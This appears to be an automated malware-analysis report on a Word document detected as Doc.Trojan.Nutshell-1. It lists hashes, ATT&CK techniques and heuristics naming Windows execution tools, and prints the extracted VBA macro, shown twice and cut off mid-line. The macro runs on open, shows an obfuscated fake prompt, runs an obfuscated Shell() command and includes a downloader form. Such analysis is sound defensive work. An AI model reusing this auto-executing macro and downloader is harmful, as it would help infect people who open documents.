Office (OLE) malware analysis — malicious · a774855ca9d452a0

MALICIOUS

Office (OLE)

84.5 KB Created: 2000-10-07 09:13:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 1f48b4097198658c57aa414ecfa5a7f1 SHA-1: 3fa6a8e454ee3671bc33f1f1c6f553acc60e7588 SHA-256: a774855ca9d452a07e8bb9cf396056d9841a9c045bcdd37661b8e04123f11032

260 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File: User Execution: Malicious Macro T1071.001 Web Protocols: Web Protocols T1105 Ingress Tool Transfer

The sample contains VBA macros that execute upon opening the document, specifically the Document_Open subroutine. This subroutine uses the Shell() function to execute a command, likely to download and run a second-stage payload. The obfuscated command string 'ÀÊ¼¹ºÁ�‡|ºÆºnÀ³Ç¼ººˆ€ƒ²Áº�”¶Â¶ºšÆ¾Â' is a strong indicator of malicious intent. The presence of a fake prompt further supports a social engineering attack.

Heuristics 6

ClamAV: Doc.Trojan.Nutshell-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Nutshell-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11439 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11439 bytes
SHA-256: `5696491af878e5c815e7e5e742e733c437a5b836336c967bfbcdb23d55d7e1d4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If Dir(d("±�ªÌ·Ã²ÄÅÈªÌ½Ç²Ê¾¹ª \| ")) = "" Then If MsgBox(d("¢½·Èn»³¶ÂÊÀºn¾Áu±ÊÀÇ³ÃÂÁÇu¼ÄÂu·ÃÁÉ¯Áºº²ƒn¬½Êº¹nÎ½ÊnÁ·À³uÂÄn¾¼ÈÂ¶ºÁn¾Âu¼ÄÅ”"), vbExclamation + vbYesNo) = vbYes Then frmDownload.Show Else MsgBox d("§ÄÃu±¶¼Ã½ÉnË·ºÅuÂ½·Èn¹½¸ÃÂ³ÃÂuÃÃÂ¾ºuÇÄÃu·ÃÁÉ¯ÁºuÂ½·Èn»³¶ÂÊÀº\|"), vbExclamation End If Else Shell d("ÀÊ¼¹ºÁ�‡\|ºÆºnÀ³Ç¼ººˆ€ƒ²Áº�”¶Â¶ºšÆ¾Â") Application.Quit wdDoNotSaveChanges End If End Sub Attribute VB_Name = "frmDownload" Attribute VB_Base = "0{E0DFDE4C-711C-4323-AD12-9356409718DB}{6E553441-0077-4D3E-99C2-901F3A524528}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function df(strURL As String, strDestination As String, _ Optional UserName As String = Empty, _ Optional Password As String = Empty) _ As Boolean Const CHUNK_SIZE As Long = 1024 Const ROLLBACK As Long = 4096 On Error GoTo OhBoy Dim bData() As Byte Dim blnResume As Boolean Dim intFile As Integer Dim lngBytesReceived As Long Dim lngFileLength As Long Dim lngX Dim lastTime As Single Dim sglRate As Single Dim sglTime As Single Dim strFile As String Dim strHeader As String Dim strHost As String With Inet1 .URL = strURL .UserName = UserName .Password = Password .Execute , d("•š¢") End With While Inet1.StillExecuting DoEvents If CancelSearch Then GoTo ExitDownload Wend StatusLabel = "Saving:" ToLabel = FitText(ToLabel, strDestination) strHeader = Inet1.GetHeader Select Case Mid(strHeader, 10, 3) Case "200" Case "206" Case "204" MsgBox "Nothing to download!", vbInformation, "No Content" GoTo ExitDownload Case "401" MsgBox "Authorization failed!", vbCritical, "Unauthorized" GoTo ExitDownload Case "404" MsgBox "The file was not found!", vbCritical, "File Not Found" GoTo ExitDownload Case vbCrLf MsgBox "Cannot establish connection." & vbCr & vbCr & _ "Check your Internet connection and try again.", _ vbExclamation, _ "Cannot Establish Connection" GoTo ExitDownload Case Else strHeader = Left(strHeader, InStr(strHeader, vbCr)) If strHeader = Empty Then strHeader = "<nothing>" MsgBox "The server returned the following response:" & vbCr & vbCr & _ strHeader, _ vbCritical, _ "Error Downloading File" GoTo ExitDownload End Select lastTime = Timer - 1 strHeader = Inet1.GetHeader("Content-Length") lngFileLength = Val(strHeader) If lngFileLength = 0 Then GoTo ExitDownload End If With ProgressBar .Value = 0 .Max = lngFileLength End With lngBytesReceived = 0 intFile = FreeFile() Open strDestination For Binary Access Write As #intFile If blnResume Then Seek #intFile, lngBytesReceived + 1 Do bData = Inet1.GetChunk(CHUNK_SIZE, icByteArray) Put #intFile, , bData If CancelSearch Then Exit Do lngBytesReceived = lngBytesReceived + UBound(bData, 1) + 1 sglRate = lngBytesReceived / (Timer - lastTime) sglTime = (lngFileLength - lngBytesReceived) / sglRate TimeLabel = FormatTime(sglTime) & _ " (" & _ FormatFileSize(lngBytesReceived) & _ " of " & _ FormatFileSize(lngFileLength) & _ " copied)" RateLabel = FormatFileSize(sglRate, "###.0") & "/Sec" ProgressBar. ... (truncated)

SHA-256: 5696491af878e5c815e7e5e742e733c437a5b836336c967bfbcdb23d55d7e1d4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If Dir(d("±�ªÌ·Ã²ÄÅÈªÌ½Ç²Ê¾¹ª | ")) = "" Then
    If MsgBox(d("¢½·Èn»³¶ÂÊÀºn¾Áu±ÊÀÇ³ÃÂÁÇu¼ÄÂu·ÃÁÉ¯Áºº²ƒn¬½Êº¹nÎ½ÊnÁ·À³uÂÄn¾¼ÈÂ¶ºÁn¾Âu¼ÄÅ”"), vbExclamation + vbYesNo) = vbYes Then
        frmDownload.Show
    Else
        MsgBox d("§ÄÃu±¶¼Ã½ÉnË·ºÅuÂ½·Èn¹½¸ÃÂ³ÃÂuÃÃÂ¾ºuÇÄÃu·ÃÁÉ¯ÁºuÂ½·Èn»³¶ÂÊÀº|"), vbExclamation
    End If
Else
    Shell d("ÀÊ¼¹ºÁ�‡|ºÆºnÀ³Ç¼ººˆ€ƒ²Áº�”¶Â¶ºšÆ¾Â")
    Application.Quit wdDoNotSaveChanges
End If
End Sub

Attribute VB_Name = "frmDownload"
Attribute VB_Base = "0{E0DFDE4C-711C-4323-AD12-9356409718DB}{6E553441-0077-4D3E-99C2-901F3A524528}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function df(strURL As String, strDestination As String, _
                        Optional UserName As String = Empty, _
                        Optional Password As String = Empty) _
                        As Boolean

Const CHUNK_SIZE As Long = 1024
Const ROLLBACK As Long = 4096
On Error GoTo OhBoy
                                
                                
Dim bData() As Byte
Dim blnResume As Boolean
Dim intFile As Integer
Dim lngBytesReceived As Long
Dim lngFileLength As Long
Dim lngX
Dim lastTime As Single
Dim sglRate As Single
Dim sglTime As Single
Dim strFile As String
Dim strHeader As String
Dim strHost As String

With Inet1
    .URL = strURL
    .UserName = UserName
    .Password = Password
    .Execute , d("•š¢")
End With

While Inet1.StillExecuting
    DoEvents
    If CancelSearch Then GoTo ExitDownload
Wend

StatusLabel = "Saving:"
ToLabel = FitText(ToLabel, strDestination)
strHeader = Inet1.GetHeader
Select Case Mid(strHeader, 10, 3)
    Case "200"
    Case "206"
    Case "204"
        MsgBox "Nothing to download!", vbInformation, "No Content"
        GoTo ExitDownload
    Case "401"
        MsgBox "Authorization failed!", vbCritical, "Unauthorized"
        GoTo ExitDownload
    Case "404"
        MsgBox "The file was not found!", vbCritical, "File Not Found"
        GoTo ExitDownload
    Case vbCrLf
        MsgBox "Cannot establish connection." & vbCr & vbCr & _
               "Check your Internet connection and try again.", _
               vbExclamation, _
               "Cannot Establish Connection"
        GoTo ExitDownload
    Case Else
        strHeader = Left(strHeader, InStr(strHeader, vbCr))
        If strHeader = Empty Then strHeader = "<nothing>"
        MsgBox "The server returned the following response:" & vbCr & vbCr & _
               strHeader, _
               vbCritical, _
               "Error Downloading File"
        GoTo ExitDownload
End Select

lastTime = Timer - 1
strHeader = Inet1.GetHeader("Content-Length")
lngFileLength = Val(strHeader)
If lngFileLength = 0 Then
    GoTo ExitDownload
End If

With ProgressBar
    .Value = 0
    .Max = lngFileLength
End With

lngBytesReceived = 0


intFile = FreeFile()
Open strDestination For Binary Access Write As #intFile
If blnResume Then Seek #intFile, lngBytesReceived + 1
Do
    bData = Inet1.GetChunk(CHUNK_SIZE, icByteArray)
    Put #intFile, , bData
    If CancelSearch Then Exit Do
    lngBytesReceived = lngBytesReceived + UBound(bData, 1) + 1
    sglRate = lngBytesReceived / (Timer - lastTime)
    sglTime = (lngFileLength - lngBytesReceived) / sglRate
    TimeLabel = FormatTime(sglTime) & _
                   " (" & _
                   FormatFileSize(lngBytesReceived) & _
                   " of " & _
                   FormatFileSize(lngFileLength) & _
                   " copied)"
    RateLabel = FormatFileSize(sglRate, "###.0") & "/Sec"
    ProgressBar.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.